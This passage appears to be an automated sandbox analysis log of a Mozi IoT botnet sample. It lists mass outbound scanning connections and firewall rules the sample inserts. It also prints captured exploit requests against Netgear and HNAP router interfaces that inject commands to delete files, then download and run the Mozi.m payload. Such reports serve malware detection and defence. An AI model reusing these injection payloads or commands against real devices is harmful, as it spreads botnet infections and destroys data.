                Source: global trafficTCP traffic: 192.168.2.20:49468 -> 187.78.60.235:49152
                Source: global trafficTCP traffic: 192.168.2.20:40406 -> 29.179.230.224:5555
                Source: global trafficTCP traffic: 192.168.2.20:38360 -> 193.228.21.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:43302 -> 193.170.193.163:8080
                Source: global trafficTCP traffic: 192.168.2.20:33462 -> 198.192.88.15:49152
                Source: global trafficTCP traffic: 192.168.2.20:41862 -> 46.2.142.178:8080
                Source: global trafficTCP traffic: 192.168.2.20:59876 -> 211.157.99.239:8080
                Source: global trafficTCP traffic: 192.168.2.20:47290 -> 120.5.123.53:5555
                Source: global trafficTCP traffic: 192.168.2.20:60080 -> 92.116.223.234:8080
                Source: global trafficTCP traffic: 192.168.2.20:56766 -> 202.114.86.56:8080
                Source: global trafficTCP traffic: 192.168.2.20:44910 -> 149.240.175.109:52869
                Source: global trafficTCP traffic: 192.168.2.20:41390 -> 138.192.249.226:52869
                Source: global trafficTCP traffic: 192.168.2.20:39314 -> 81.68.199.130:5555
                Source: global trafficTCP traffic: 192.168.2.20:57720 -> 137.139.2.130:5555
                Source: global trafficTCP traffic: 192.168.2.20:36136 -> 139.199.14.195:8443
                Source: global trafficTCP traffic: 192.168.2.20:50296 -> 95.157.19.163:49152
                Source: global trafficTCP traffic: 192.168.2.20:53144 -> 70.67.151.179:7574
                Source: global trafficTCP traffic: 192.168.2.20:41754 -> 200.28.173.176:5555
                Source: global trafficTCP traffic: 192.168.2.20:37848 -> 120.93.77.91:8443
                Source: global trafficTCP traffic: 192.168.2.20:55310 -> 53.12.77.94:49152
                Source: global trafficTCP traffic: 192.168.2.20:36798 -> 176.248.47.153:49152
                Source: global trafficTCP traffic: 192.168.2.20:33678 -> 130.119.213.235:8080
                Source: global trafficTCP traffic: 192.168.2.20:44870 -> 113.11.182.35:81
                Source: global trafficTCP traffic: 192.168.2.20:56000 -> 2.138.198.216:8080
                Source: global trafficTCP traffic: 192.168.2.20:47370 -> 3.86.100.243:37215
                Source: global trafficTCP traffic: 192.168.2.20:53480 -> 217.142.133.66:37215
                Source: global trafficTCP traffic: 192.168.2.20:34236 -> 140.231.98.112:8080
                Source: global trafficTCP traffic: 192.168.2.20:50338 -> 215.249.79.198:8080
                Source: global trafficTCP traffic: 192.168.2.20:34044 -> 63.182.159.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:56914 -> 83.8.62.47:52869
                Source: global trafficTCP traffic: 192.168.2.20:55952 -> 191.248.194.68:49152
                Source: global trafficTCP traffic: 192.168.2.20:59852 -> 26.39.204.248:8443
                Source: global trafficTCP traffic: 192.168.2.20:50364 -> 132.182.225.98:8080
                Source: global trafficTCP traffic: 192.168.2.20:34340 -> 61.137.14.142:8443
                Source: global trafficTCP traffic: 192.168.2.20:49066 -> 181.203.100.36:8080
                Source: global trafficTCP traffic: 192.168.2.20:55552 -> 106.14.60.18:8443
                Source: global trafficTCP traffic: 192.168.2.20:33890 -> 162.136.172.41:81
                Source: global trafficTCP traffic: 192.168.2.20:54628 -> 41.155.207.183:5555
                Source: global trafficTCP traffic: 192.168.2.20:34408 -> 99.148.201.126:8443
                Source: global trafficTCP traffic: 192.168.2.20:54248 -> 190.192.94.182:5555
                Source: global trafficTCP traffic: 192.168.2.20:52354 -> 92.141.22.32:8080
                Source: global trafficTCP traffic: 192.168.2.20:36158 -> 43.93.231.189:81
                Source: global trafficTCP traffic: 192.168.2.20:53898 -> 21.188.95.234:8080
                Source: global trafficTCP traffic: 192.168.2.20:37272 -> 85.195.54.139:37215
                Source: global trafficTCP traffic: 192.168.2.20:54602 -> 21.127.188.168:81
                Source: global trafficTCP traffic: 192.168.2.20:60226 -> 133.215.160.216:81
                Source: global trafficTCP traffic: 192.168.2.20:47520 -> 165.101.122.42:81
                Source: global trafficTCP traffic: 192.168.2.20:46422 -> 198.125.156.213:81
                Source: global trafficTCP traffic: 192.168.2.20:57890 -> 116.155.23.65:52869
                Source: global trafficTCP traffic: 192.168.2.20:46796 -> 24.54.15.164:7574
                Source: global trafficTCP traffic: 192.168.2.20:43308 -> 2.158.179.66:37215
                Source: global trafficTCP traffic: 192.168.2.20:58486 -> 74.194.107.251:8080
                Source: global trafficTCP traffic: 192.168.2.20:45926 -> 94.230.220.30:5555
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 119.209.23.112:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 102.176.178.224:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 199.69.235.21:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 158.92.202.121:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 122.243.254.61:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 144.63.116.58:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 108.192.176.65:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 108.153.206.152:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 103.232.41.84:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 87.76.34.106:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 44.46.34.202:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 98.200.244.150:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 8.133.238.164:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 13.197.37.37:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 119.18.92.1:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 75.1.214.251:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 212.239.243.44:2323
                Source: global trafficTCP traffic: 192.168.2.20:56782 -> 136.44.214.227:8080
                Source: global trafficTCP traffic: 192.168.2.20:40440 -> 123.30.132.60:37215
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 180.87.46.7:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 194.76.167.240:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 19.163.225.60:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 41.66.166.102:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 57.39.61.233:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 181.44.194.250:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 65.219.26.223:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 108.207.211.243:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 223.255.156.91:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 188.89.65.27:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 47.246.174.228:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 104.54.87.43:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 107.145.6.139:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 212.50.67.118:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 68.103.55.168:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 124.207.8.18:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 198.184.153.233:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 100.209.152.180:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 121.220.162.59:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 107.33.123.182:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 170.146.44.71:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 139.210.220.124:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 184.234.20.63:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 45.223.99.28:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 154.86.108.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 20.202.173.70:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 217.188.58.175:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 61.46.241.38:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 153.116.132.166:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 104.222.148.240:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 217.221.166.38:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 70.6.244.64:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 19.18.50.247:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 75.137.161.83:2323
                Source: global trafficTCP traffic: 192.168.2.20:57876 -> 71.40.128.63:49152
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 36.6.47.186:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 5.71.245.186:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 209.37.10.223:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 147.148.65.25:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 194.207.70.113:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 182.24.155.194:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 70.135.20.121:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 91.180.230.147:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 202.221.1.28:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 96.50.197.214:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 42.56.59.180:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 203.213.20.163:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 91.244.32.53:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 186.81.247.159:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 119.202.144.95:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 119.173.29.245:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 9.172.43.63:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 8.208.36.68:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 180.52.239.233:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 203.70.165.212:2323
                Source: /bin/sh (PID: 4616)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4650)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4653)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4690)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4716)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4739)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4748)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4793)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4796)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4805)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4829)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4878)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4906)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4926)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4931)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 4947)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4974)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5000)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5021)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5025)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5034)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5057)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5087)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5117)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5120)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5127)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5152)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5182)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5210)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5231)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5234)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 121.5.104.125:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 121.5.104.125:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
